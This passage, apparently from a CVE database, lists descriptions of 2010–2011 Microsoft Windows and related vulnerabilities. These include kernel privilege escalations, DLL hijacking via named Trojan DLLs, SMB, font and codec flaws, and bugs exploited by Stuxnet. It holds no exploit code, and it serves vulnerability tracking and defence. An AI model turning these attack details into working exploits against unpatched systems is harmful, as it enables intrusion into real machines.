SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted WMF file, aka "OLE Automation Underflow Vulnerability." [CVE-2011-0657] DNSAPI.dll in the DNS client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process DNS queries, which allows remote attackers to execute arbitrary code via (1) a crafted LLMNR broadcast query or (2) a crafted application, aka "DNS Query Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0627] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content, as possibly exploited in the wild in May 2011 by a Microsoft Office document with an embedded .swf file. [CVE-2011-0347] Microsoft Internet Explorer on Windows XP allows remote attackers to trigger an incorrect GUI display and have unspecified other impact via vectors related to the DOM implementation, as demonstrated by cross_fuzz. [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0091] Kerberos in Microsoft Windows Server 2008 R2 and Windows 7 does not prevent a session from changing from strong encryption to DES encryption, which allows man-in-the-middle attackers to spoof network traffic and obtain sensitive information via a DES downgrade, aka "Kerberos Spoofing Vulnerability." [CVE-2011-0090] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2011-0089] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Improper Pointer Validation Vulnerability." [CVE-2011-0088] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Pointer Confusion Vulnerability." [CVE-2011-0087] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient User Input Validation Vulnerability." [CVE-2011-0086] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Improper User Input Validation Vulnerability." [CVE-2011-0045] The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability." [CVE-2011-0043] Kerberos in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 supports weak hashing algorithms, which allows local users to gain privileges by operating a service that sends crafted service tickets, as demonstrated by the CRC32 algorithm, aka "Kerberos Unkeyed Checksum Vulnerability." [CVE-2011-0042] SBE.dll in the Stream Buffer Engine in Windows Media Player and Windows Media Center in Microsoft Windows XP SP2 and SP3, Windows XP Media Center Edition 2005 SP3, Windows Vista SP1 and SP2, Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista does not properly parse Digital Video Recording (.dvr-ms) files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DVR-MS Vulnerability." [CVE-2011-0041] Integer overflow in gdiplus.dll in GDI+ in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted EMF image, aka "GDI+ Integer Overflow Vulnerability." [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2011-0039] The Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly process authentication requests, which allows local users to gain privileges via a request with a crafted length, aka "LSASS Length Validation Vulnerability." [CVE-2011-0037] Microsoft Malware Protection Engine before 1.1.6603.0, as used in Microsoft Malicious Software Removal Tool (MSRT), Windows Defender, Security Essentials, Forefront Client Security, Forefront Endpoint Protection 2010, and Windows Live OneCare, allows local users to gain privileges via a crafted value of an unspecified user registry key. [CVE-2011-0034] Stack-based buffer overflow in the OpenType Compact Font Format (aka OTF or CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted parameter values in an OpenType font, aka "OpenType Font Stack Overflow Vulnerability." [CVE-2011-0033] The OpenType Compact Font Format (CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate parameter values in OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted font, aka "OpenType Font Encoded Character Vulnerability." [CVE-2011-0032] Untrusted search path vulnerability in DirectShow in Microsoft Windows Vista SP1 and SP2, Windows 7 Gold and SP1, Windows Server 2008 R2 and R2 SP1, and Windows Media Center TV Pack for Windows Vista allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Digital Video Recording (.dvr-ms), Windows Recorded TV Show (.wtv), or .mpg file, aka "DirectShow Insecure Library Loading Vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0030] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Elevation of Privilege Vulnerability," a different vulnerability than CVE-2010-0023. [CVE-2011-0028] WordPad in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse fields in Word documents, which allows remote attackers to execute arbitrary code via a crafted .doc file, aka "WordPad Converter Parsing Vulnerability." [CVE-2011-0027] Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka "ADO Record Memory Vulnerability." NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118. [CVE-2011-0026] Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka "DSN Overflow Vulnerability." [CVE-2010-5082] Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in the Color Control Panel in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges via a Trojan horse sti.dll file in the current working directory, as demonstrated by a directory that contains a .camp, .cdmp, .gmmp, .icc, or .icm file, aka "Color Control Panel Insecure Library Loading Vulnerability." [CVE-2010-4701] Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote attackers to execute arbitrary code via a long record in a Fax Cover Page (.cov) file. NOTE: some of these details are obtained from third party information. [CVE-2010-4669] The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package. [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652. [CVE-2010-4398] Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control (UAC) feature, via a crafted REG_BINARY value for a SystemDefaultEUDCFont registry key, aka "Driver Improper Interaction with Windows Kernel Vulnerability." [CVE-2010-4182] Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll. NOTE: the provenance of this information is unknown [CVE-2010-3974] fxscover.exe in the Fax Cover Page Editor in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse FAX cover pages, which allows remote attackers to execute arbitrary code via a crafted .cov file, aka "Fax Cover Page Editor Memory Corruption Vulnerability." [CVE-2010-3973] The WMITools ActiveX control in WBEMSingleView.ocx 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted argument to the AddContextRef method, possibly an untrusted pointer dereference, aka "Microsoft WMITools ActiveX Control Vulnerability." [CVE-2010-3970] Stack-based buffer overflow in the CreateSizedDIBSECTION function in shimgvw.dll in the Windows Shell graphics processor (aka graphics rendering engine) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted .MIC or unspecified Office document containing a thumbnail bitmap with a negative biClrUsed value, as reported by Moti and Xu Hao, aka "Windows Shell Graphics Processing Overrun Vulnerability." [CVE-2010-3967] Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3966] Untrusted search path vulnerability in Microsoft Windows Server 2008 R2 and Windows 7, when BranchCache is supported, allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an EML file, an RSS file, or a WPOST file, aka "BranchCache Insecure Library Loading Vulnerability." [CVE-2010-3965] Untrusted search path vulnerability in Windows Media Encoder 9 on Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Windows Media Profile (PRX) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3963] Buffer overflow in the Routing and Remote Access NDProxy component in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, related to the Routing and Remote Access service (RRAS) and improper copying from user mode to the kernel, aka "Kernel NDProxy Buffer Overflow Vulnerability." [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3960] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, and R2 allows guest OS users to cause a denial of service (host OS hang) by sending a crafted encapsulated packet over the VMBus, aka "Hyper-V VMBus Vulnerability." [CVE-2010-3959] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted CMAP table in an OpenType font, aka "OpenType CMAP Table Vulnerability." [CVE-2010-3957] Double free vulnerability in the OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Double Free Vulnerability." [CVE-2010-3956] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly perform array indexing, which allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Index Vulnerability." [CVE-2010-3944] win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2010-3943] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly link driver objects, which allows local users to gain privileges via a crafted application that triggers linked-list corruption, aka "Win32k Cursor Linking Vulnerability." [CVE-2010-3942] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for copies from user mode, which allows local users to gain privileges via a crafted application, aka "Win32k WriteAV Vulnerability." [CVE-2010-3941] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k Double Free Vulnerability." [CVE-2010-3940] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k PFE Pointer Double Free Vulnerability." [CVE-2010-3939] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via vectors related to improper memory allocation for copies from user mode, aka "Win32k Buffer Overflow Vulnerability." [CVE-2010-3937] Microsoft Exchange Server 2007 SP2 on the x64 platform allows remote authenticated users to cause a denial of service (infinite loop and MSExchangeIS outage) via a crafted RPC request, aka "Exchange Server Infinite Loop Vulnerability." [CVE-2010-3889] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers. [CVE-2010-3888] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers. [CVE-2010-3338] The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888. [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3229] The Secure Channel (aka SChannel) security package in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when IIS 7.x is used, does not properly process client certificates during SSL and TLS handshakes, which allows remote attackers to cause a denial of service (LSASS outage and reboot) via a crafted packet, aka "TLSv1 Denial of Service Vulnerability." [CVE-2010-3227] Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability." [CVE-2010-3225] Use-after-free vulnerability in the Media Player Network Sharing Service in Microsoft Windows Vista SP1 and SP2 and Windows 7 allows remote attackers to execute arbitrary code via a crafted Real Time Streaming Protocol (RTSP) packet, aka "RTSP Use After Free Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3147] Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143. [CVE-2010-3145] Untrusted search path vulnerability in the BitLocker Drive Encryption API, as used in sdclt.exe in Backup Manager in Microsoft Windows Vista SP1 and SP2, allows local users to gain privileges via a Trojan horse fveapi.dll file in the current working directory, as demonstrated by a directory that contains a Windows Backup Catalog (.wbcat) file, aka "Backup Manager Insecure Library Loading Vulnerability." [CVE-2010-3144] Untrusted search path vulnerability in the Internet Connection Signup Wizard in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse smmscrpt.dll file in the current working directory, as demonstrated by a directory that contains an ISP or INS file, aka "Internet Connection Signup Wizard Insecure Library Loading Vulnerability." [CVE-2010-3143] Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147. [CVE-2010-3140] Untrusted search path vulnerability in Microsoft Windows Internet Communication Settings on Windows XP SP3 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as an ISP file. [CVE-2010-3138] Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-2746] Heap-based buffer overflow in Comctl32.dll (aka the common control library) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when a third-party SVG viewer is used, allows remote attackers to execute arbitrary code via a crafted HTML document that triggers unspecified messages from this viewer, aka "Comctl32 Heap Overflow Vulnerability." [CVE-2010-2745] Microsoft Windows Media Player (WMP) 9 through 12 does not properly deallocate objects during a browser reload action, which allows user-assisted remote attackers to execute arbitrary code via crafted media content referenced in an HTML document, aka "Windows Media Player Memory Corruption Vulnerability." [CVE-2010-2744] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly manage a window class, which allows local users to gain privileges by creating a window, then using (1) the SetWindowLongPtr function to modify the popup menu structure, or (2) the SwitchWndProc function with a switch window information pointer, which is not re-initialized when a WM_NCCREATE message is processed, aka "Win32k Window Class Vulnerability." [CVE-2010-2743] The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889. [CVE-2010-2741] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 performs an incorrect integer calculation during font processing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Validation Vulnerability." [CVE-2010-2740] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly perform memory allocation during font parsing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Parsing Vulnerability." [CVE-2010-2739] Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2731] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka "Directory Authentication Bypass Vulnerability." [CVE-2010-2568] Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems. [CVE-2010-2566] The Secure Channel (aka SChannel) security package in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, does not properly validate certificate request messages from TLS and SSL servers, which allows remote servers to execute arbitrary code via a crafted SSL response, aka "SChannel Malformed Certificate Request Remote Code Execution Vulnerability." [CVE-2010-2564] Buffer overflow in Microsoft Windows Movie Maker (WMM) 2.1, 2.6, and 6.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted project file, aka "Movie Maker Memory Corruption Vulnerability." [CVE-2010-2563] The Word 97 text converter in the WordPad Text Converters in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse malformed structures in Word 97 documents, which allows remote attackers to execute arbitrary code via a crafted document containing an unspecified value that is used in a loop counter, aka "WordPad Word 97 Text Converter Memory Corruption Vulnerability." [CVE-2010-2555] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the length of strings in the registry, which allows local users to gain privileges or cause a denial of service (memory corruption) via vectors involving a long string, aka "Tracing Memory Corruption Vulnerability." [CVE-2010-2554] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka "Tracing Registry Key ACL Vulnerability." [CVE-2010-2553] The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability." [CVE-2010-2552] Stack consumption vulnerability in the SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (system hang) via a malformed SMBv2 compounded request, aka "SMB Stack Exhaustion Vulnerability." [CVE-2010-2551] The SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate an internal variable in an SMB packet, which allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 packet, aka "SMB Variable Validation Vulnerability." [CVE-2010-2550] The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." [CVE-2010-2549] Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability." [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1897] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate pseudo-handle values in callback parameters during window creation, which allows local users to gain privileges via a crafted application, aka "Win32k Window Creation Vulnerability." [CVE-2010-1896] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 do not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k User Input Validation Vulnerability." [CVE-2010-1895] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly perform memory allocation before copying user-mode data to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k Pool Overflow Vulnerability." [CVE-2010-1894] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling 